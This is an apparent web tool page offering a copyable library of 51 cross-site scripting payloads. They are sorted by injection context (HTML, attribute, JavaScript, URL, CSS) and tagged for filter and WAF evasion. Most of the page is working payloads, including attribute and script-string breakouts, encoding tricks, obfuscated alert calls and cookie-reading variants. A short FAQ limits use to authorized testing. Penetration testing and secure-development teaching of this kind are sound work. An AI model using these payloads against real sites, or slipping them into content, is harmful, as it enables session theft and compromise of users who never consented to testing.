XSS Payload Generator
A searchable library of 50+ XSS test payloads organized by injection context. Filter by bypass type, encoding, and WAF evasion techniques.
51 payloads
Classic script injection
<script>alert(1)</script>
Image error event handler
<img src=x onerror=alert(1)>
SVG onload event
<svg onload=alert(1)>
Body onload event
<body onload=alert(1)>
Iframe with javascript URI
<iframe src="javascript:alert(1)">
Details element toggle event
<details open ontoggle=alert(1)>
Marquee onstart event
<marquee onstart=alert(1)>
Video source error event
<video><source onerror="alert(1)">
Input autofocus with onfocus
<input onfocus=alert(1) autofocus>
Select autofocus trigger
<select autofocus onfocus=alert(1)>
Textarea autofocus trigger
<textarea autofocus onfocus=alert(1)>
Mutation XSS via nested elements
<math><mtext><table><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">
Break out of attribute with event
" onmouseover="alert(1)
Single-quote attribute breakout
' onfocus='alert(1)' autofocus='
Autofocus onfocus breakout
" autofocus onfocus="alert(1)
Close tag and inject SVG
"><svg onload=alert(1)>
Break JS string in attribute
'-alert(1)-'
Escape quote with backslash
\"><img src=x onerror=alert(1)>
Break out of JS string
';alert(1)//
Break out of double-quoted JS string
";alert(1)//
Template literal injection
${alert(1)}Close script tag and open new
</script><script>alert(1)</script>
Arithmetic operator injection
'-alert(1)-'
Bypass escaped quote
\';alert(1)//
JavaScript protocol
javascript:alert(1)
Data URI with script
data:text/html,<script>alert(1)</script>
Base64-encoded data URI
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
Newline bypass in javascript protocol
java%0ascript:alert(1)
HTML entity encoded alert
<img src=x onerror="alert(1)">
No space between tag and event
<svg/onload=alert(1)>
Template literal instead of parentheses
<img src=x onerror=alert`1`>
Mixed case bypass
<ScRiPt>alert(1)</ScRiPt>
Recursive tag bypass
<scr<script>ipt>alert(1)</scr</script>ipt>
Double angle bracket bypass
<<script>alert(1)//<</script>
HTML entity encoded javascript URI
<a href="javascript:alert(1)">click</a>
Unicode escape in event handler
<img src=x onerror=\u0061lert(1)>
Slash as attribute separator
<img/src="x"/onerror=alert(1)>
CSS expression (IE)
expression(alert(1))
CSS url() with javascript
url('javascript:alert(1)')Style attribute with javascript URL
<div style="background:url(javascript:alert(1))">
CSS import with javascript
<style>@import "data:text/css,*{background:url(javascript:alert(1))}";</style>DOM-based via location.hash
#<img src=x onerror=alert(1)>
Exfiltrate domain via alert
<img src=1 onerror=alert(document.domain)>
Cookie stealing payload
<img src=1 onerror=alert(document.cookie)>
SVG animate event handler
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
Object with data URI
<object data="data:text/html,<script>alert(1)</script>">
Isindex element event handler
<isindex type=image src=1 onerror=alert(1)>
Use id attribute for eval bypass
"><img src=x id=alert(1) onerror=eval(id)>
String concatenation bypass
<img src=x onerror=window["al"+"ert"](1)>
Regex source bypass
<img src=x onerror=top[/al/.source+/ert/.source](1)>
SVG set element event
<svg><set onbegin=alert(1)>
How to Use the XSS Payload Generator
- Search for specific payloads using the search bar.
- Filter by context: HTML, Attribute, JavaScript, URL, or CSS.
- Browse payloads with their descriptions explaining why each works.
- Click the copy button to copy a payload to your clipboard.
- Review tags to identify payload characteristics (basic, bypass, WAF evasion, etc.).
About XSS Payload Generator
Cross-Site Scripting (XSS) is one of the most common web vulnerabilities, allowing attackers to inject malicious scripts into web pages. This reference library contains test payloads organized by injection context (HTML, attribute, JavaScript, URL, CSS) and tagged with characteristics like WAF bypass techniques and encoding methods. Each payload includes an explanation of why it works. This tool is designed for authorized security testing and educational purposes to help developers understand and prevent XSS vulnerabilities.
Frequently Asked Questions
These payloads should only be used for authorized security testing on systems you own or have explicit permission to test. Unauthorized testing is illegal in most jurisdictions. This tool is intended for security professionals, developers, and CTF participants.
The injection context determines which payloads will work. HTML context means your input lands directly in the page body. Attribute context means input goes inside an HTML tag attribute. JavaScript context means input is within a script block. Each requires different escape techniques.